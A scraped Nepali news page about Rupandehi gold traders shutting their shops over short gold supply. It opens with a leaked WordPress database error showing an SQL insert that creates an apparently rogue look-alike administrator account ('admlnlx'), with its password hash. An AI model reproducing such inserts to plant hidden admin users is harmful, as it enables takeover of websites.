WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpRLFDjF6Mpp7GpCy3r8XXQ.vVvwFl.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 08:08:56', '', 'admlnlx', 'admlnlx')
बुटवल,माघ ५-
बिक्री बितरण गर्न आबश्यक सुन नपाएको भन्दै रुपन्देहीका सुनचादी व्यवसायीहरु आन्दोलनमा उत्रीएका छन् । उनीहरुले जिल्लाभरका सुन पसल बन्द गरेका छन् ।
बिहेको सिजनमा सुनको माग बढे पनि १५ दिनमा जम्मा ३ किलो मात्रै सुन उपलब्ध भएपछि व्यवसायीहरु आन्दोलीत भएका हुन् ।
सुनचादी व्यवसायी संघका अनुसार रुपन्देहीमा करिब ३ सय ५० सुन पसल छन् ।तिनलाई दैनिक २ किलो सुनको आवश्यकता पर्छ ।
आन्दोलनमा उत्रीएका व्यवसायीले माग अनुसारको सुन उपलब्ध गराउन भन्दै प्रमुख जिल्ला अधिकारी मार्फत अर्थ मन्त्रालयमा ज्ञापन पत्र समेत पठाएका छन् ।
कतैबाट माग सुनुवाइ नभएकाले आज र भोलि २ दिनका लागि सुन पसल बन्द गरेको सुनचादी व्यवसायी संघ रुपन्देहीका अध्यक्ष बिक्रम बहादुर सुनारले बताए । आन्दोलनको थप रणनीति बनाउन संघको बैठक बसिरहेको छ ।